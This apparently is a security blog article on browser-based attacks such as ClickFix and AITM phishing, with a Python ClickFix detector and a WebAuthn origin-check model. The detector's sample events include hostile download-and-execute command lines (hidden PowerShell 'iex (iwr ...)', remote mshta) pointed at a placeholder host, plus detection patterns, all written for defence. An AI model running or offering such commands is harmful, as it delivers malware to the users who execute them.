Mar 18, 2026 · 6 min read
Most Breaches Now Start in Your Browser—ClickFix, AITM, and the New Threat Landscape
Push Security's 2026 report reveals the browser has replaced email as the primary attack surface, with one in three phishing attacks now delivered outside the inbox entirely.
The Browser Is the New Perimeter
For years, security teams built their defenses around the inbox. Email was where phishing began, where malware arrived, and where social engineering found its victims. That assumption is no longer safe. Push Security's 2026 Browser Attack Techniques report documents a fundamental shift in how breaches happen. According to the report, roughly one in three phishing attacks detected by their platform were delivered outside of email entirely, arriving instead through browser redirects, malicious search results, compromised advertisements, and manipulated OAuth flows.
The finding confirms what many security researchers have suspected for months. As email filtering has improved, attackers have pivoted to the browser itself as the primary entry point. "Modern breaches begin in the browser," the report states. "Often, they never leave it." The attacks target cloud applications and identities rather than traditional endpoints, making the browser a significant blind spot for organizations still focused on endpoint detection and email gateways.
ClickFix: The Technique Behind Nearly Half of All Initial Access
The most significant finding in the report is the dominance of ClickFix as an initial access technique. Microsoft reported that ClickFix was the top initial access vector it detected in 2025, involved in 47 percent of attacks. The technique works by socially engineering users into running malicious code on their own machines. In a typical ClickFix attack, the victim encounters what appears to be a legitimate error message, CAPTCHA verification, or software update prompt in their browser. The page instructs them to copy a command and paste it into a terminal, PowerShell window, or Run dialog to fix the supposed problem.
The command deploys remote access tools, infostealer malware, or both. Because the user manually executes the code, the attack bypasses most endpoint protections that focus on blocking automated execution. The victim has effectively become the delivery mechanism for their own compromise.
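The behaviour described above leaves a process-tree trace a defender can hunt for: the Run dialog is hosted by explorer.exe, so a pasted command shows up as a script interpreter spawned by explorer.exe with download-and-execute switches on its command line. The following scoring heuristic over constructed Sysmon-style process-creation events is an added example, not code from the report; the event records, the example.invalid domain and the weights are assumptions.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1-like shape (sample data,
# not taken from the report); example.invalid is a reserved placeholder domain.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://example.invalid/verify.txt)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://example.invalid/captcha"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"ParentImage": r"C:\Program Files\VSCode\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
]

# Interpreters a ClickFix page tells the user to paste into (Run dialog, PowerShell, cmd).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# The Run dialog (Win+R) is hosted by explorer.exe, so it is the parent of a pasted command.
USER_LAUNCHERS = {"explorer.exe"}
INDICATORS = [
    (r"\b(iex|invoke-expression)\b", "inline eval"),
    (r"\b(iwr|invoke-webrequest|downloadstring|curl)\b", "download cmdlet"),
    (r"https?://", "remote URL"),
    (r"-(w|windowstyle)\s+hidden", "hidden window"),
    (r"-(e|enc|encodedcommand)\b", "encoded command"),
    (r"^mshta\s+https?://", "mshta remote"),
]

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev: dict):
    """Return (score, matched indicator labels) for one process-creation event."""
    child, parent = basename(ev["Image"]), basename(ev["ParentImage"])
    if child not in INTERPRETERS:
        return 0, []
    cmd = ev["CommandLine"].lower()
    hits = [label for pat, label in INDICATORS if re.search(pat, cmd)]
    score = len(hits) + (2 if parent in USER_LAUNCHERS else 0)  # interactive launch weighs extra
    return score, hits

def flag_clickfix(events, threshold: int = 3):
    """Events whose score reaches the threshold, as (command line, indicators) pairs."""
    scored = [(ev["CommandLine"], score_event(ev)) for ev in events]
    return [(cmd, hits) for cmd, (score, hits) in scored if score >= threshold]
```

The developer's build script in the last event scores zero because it has neither an interactive parent nor any download-and-execute switches, which is the distinction the rule is built around.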
The report also identifies a new variant called ConsentFix, a browser-native ClickFix attack that phishes an OAuth token by getting the victim to copy and paste a URL containing OAuth key material into a phishing page. Unlike traditional ClickFix, ConsentFix operates entirely within the browser and targets cloud application access directly, without ever touching the endpoint's operating system.
AITM Phishing: MFA Is No Longer Enough
Adversary-in-the-middle (AITM) phishing has matured from a novel technique into a standard tool in the attacker's playbook. AITM kits work by placing a reverse proxy between the victim and the legitimate login page. The user sees the real site, enters their real credentials, and completes their real MFA challenge. The proxy captures everything, including the session token that the legitimate site returns after successful authentication. The attacker now has a fully authenticated session without ever needing the user's password or MFA device again.
Push Security's report emphasizes that most forms of MFA can be bypassed by AITM techniques. Real-world examples continue to surface, including a recent AITM phishing campaign targeting TikTok business accounts through fake Google SSO pages. The exception is passkeys, which bind authentication to the specific domain and cannot be proxied. For organizations that have not yet deployed passkeys, the AITM threat means that multifactor authentication provides significantly less protection than many assume. A phishing-resistant credential like a passkey or hardware security key is now the minimum viable defense against this class of attack.
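Why a proxy cannot relay a passkey comes down to two checks in the WebAuthn assertion procedure: the browser writes the page's real origin into clientDataJSON (page script cannot change it), and the relying party compares that origin, and the rpIdHash in authenticatorData, against its own values. The model below is an added example, not the report's or any library's code; the relying party login.example.com, the proxy origin proxy.example.net and the omission of the signature step are assumptions.

```python
import base64
import hashlib
import json
import os
# Assumed relying party (RP) and proxy origin for the walk-through (placeholders).
RP_ID = "login.example.com"
RP_ORIGIN = "https://login.example.com"
PROXY_ORIGIN = "https://proxy.example.net"   # stands in for an AITM reverse proxy

def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def browser_get_assertion(page_origin: str, rp_id: str, challenge: bytes):
    """Model of the browser's WebAuthn client: the origin written into clientDataJSON
    is the one the page was loaded from; page script (or a proxy) cannot choose it."""
    host = page_origin.split("://", 1)[1]
    if not (host == rp_id or host.endswith("." + rp_id)):
        raise ValueError("SecurityError: rpId is not a registrable suffix of the origin")
    client_data = json.dumps({"type": "webauthn.get", "challenge": b64url(challenge),
                              "origin": page_origin}).encode()
    # authenticatorData = rpIdHash(32) | flags UP|UV | signCount(4); signature not modelled
    auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x05" + b"\x00\x00\x00\x01"
    return client_data, auth_data

def rp_verify(client_data: bytes, auth_data: bytes, expected_challenge: bytes):
    """RP-side checks from the WebAuthn assertion verification procedure."""
    cd = json.loads(client_data)
    if cd.get("type") != "webauthn.get":
        return False, "wrong type"
    if cd.get("challenge") != b64url(expected_challenge):
        return False, "challenge mismatch"
    if cd.get("origin") != RP_ORIGIN:
        return False, "origin mismatch: " + str(cd.get("origin"))
    if auth_data[:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    # A real RP now checks the signature over auth_data + sha256(client_data) with the stored key.
    return True, "ok"

def direct_login():
    challenge = os.urandom(32)
    return rp_verify(*browser_get_assertion(RP_ORIGIN, RP_ID, challenge), challenge)

def proxied_login():
    """Victim's browser sits on the proxy origin; the proxy relays the RP's real challenge."""
    challenge = os.urandom(32)
    try:  # the proxied page cannot even request the RP's rpId from its own origin
        cd, ad = browser_get_assertion(PROXY_ORIGIN, RP_ID, challenge)
    except ValueError:  # so the best it can do is relay an assertion for its own domain
        cd, ad = browser_get_assertion(PROXY_ORIGIN, "proxy.example.net", challenge)
    return rp_verify(cd, ad, challenge)
```

Contrast this with a TOTP code or push approval, which carries no origin at all and is accepted by the legitimate site no matter which page the user typed it into.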
The Full Threat Landscape
Beyond ClickFix and AITM, the report catalogs four additional browser-based attack categories that security teams need to account for.
- Malicious OAuth applications that abuse legitimate consent flows to gain persistent access to cloud accounts without ever touching credentials
- Malicious browser extensions that gain access to cookies, form data, and browsing activity through permissions the user grants during installation
- Credential stuffing and ghost logins where previously breached passwords are tested against cloud applications at scale, with successful logins providing immediate access to business data
- Session hijacking using stolen session tokens extracted from compromised endpoints, infostealer logs, or browser extension data
What connects all six techniques is that they exploit the browser as a trusted intermediary. Legacy security tools that inspect network traffic, scan email attachments, or monitor endpoint processes often have limited visibility into what happens inside a browser session. The browser has become, in the report's framing, the primary attack surface for modern breaches. The consequences are visible at scale—over 7,500 Magento ecommerce sites were recently mass-compromised through an unauthenticated file upload vulnerability, turning trusted shopping sites into potential attack vectors for their visitors.
Why Legacy Tools Cannot Keep Up
The report argues that the shift toward browser-based attacks has outpaced the security tools most organizations rely on. Secure email gateways stop phishing in the inbox but have no visibility into phishing that arrives through search results, ads, or social media links. Endpoint detection and response tools monitor file system and process activity but cannot inspect the contents of an encrypted browser session. Cloud access security brokers inspect traffic to known SaaS applications but may miss OAuth grants or browser extension activity.
The gap is not theoretical. The report includes case studies from real-world incidents where attackers moved from initial browser compromise to full account takeover without triggering any alerts from traditional security tooling. In several cases, the entire attack chain, from phishing to data exfiltration, occurred within the browser without any executable touching the endpoint's file system.
What You Can Do About It
The most effective immediate step is deploying phishing-resistant authentication. Passkeys and hardware security keys defeat AITM attacks because the authentication is bound to the legitimate domain and cannot be replayed through a proxy. For organizations that cannot deploy passkeys universally, enforcing conditional access policies that restrict logins to managed devices and known networks reduces the attack surface significantly.
Browser extension auditing should be a routine security process. Organizations can use group policies or mobile device management to restrict which extensions employees can install, and regular audits of installed extensions can identify suspicious or unnecessary permissions.
For ClickFix specifically, user awareness training needs to evolve beyond email phishing scenarios to include browser-based social engineering. Employees should know that any webpage asking them to open a terminal and paste a command is almost certainly malicious, regardless of how legitimate the page appears. The combination of technical controls and updated training is the minimum viable defense against a threat landscape that has moved decisively from the inbox to the browser.